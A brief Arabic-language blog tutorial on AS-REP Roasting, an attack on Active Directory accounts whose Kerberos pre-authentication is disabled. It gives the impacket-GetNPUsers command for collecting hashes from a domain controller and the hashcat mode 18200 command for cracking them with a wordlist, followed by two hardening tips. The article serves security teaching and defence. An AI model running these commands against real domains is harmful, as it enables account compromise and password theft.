إعلان

AS-REP Roasting

هجوم AS-REP Roasting على المستخدمين الذين تم تعطيل Kerberos Pre-Auth لهم

Cyberah

20 Apr 2026

1 دقائق قراءة

— مشاهدة

فهرس المحتوى

ما هو AS-REP Roasting؟
البحث عن الحسابات المعرضة
كسر التشفير
الحماية

إعلان

ما هو AS-REP Roasting؟

يستهدف هذا الهجوم المستخدمين الذين تم تعطيل Kerberos Pre-Authentication لهم. يمكن طلب AS-REP دون المصادقة وكسر التشفير offline.

البحث عن الحسابات المعرضة

impacket-GetNPUsers DOMAIN/ -usersfile users.txt -dc-ip 10.10.10.1

كسر التشفير

hashcat -m 18200 hashes.txt /usr/share/wordlists/rockyou.txt

الحماية

لا تعطل Kerberos Pre-Auth إلا عند الضرورة القصوى
راجع دورياً المستخدمين الذين لديهم DONT_REQUIRE_PREAUTH